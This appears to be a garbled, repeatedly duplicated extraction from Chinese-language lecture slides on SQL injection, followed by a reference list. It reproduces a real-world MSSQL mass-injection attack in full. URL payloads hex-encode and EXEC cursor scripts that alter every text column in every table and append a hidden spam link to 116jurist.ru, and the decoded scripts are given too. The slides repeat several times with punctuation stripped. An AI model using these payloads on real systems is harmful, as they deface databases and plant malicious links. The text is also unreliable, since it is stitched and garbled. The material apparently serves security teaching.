stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008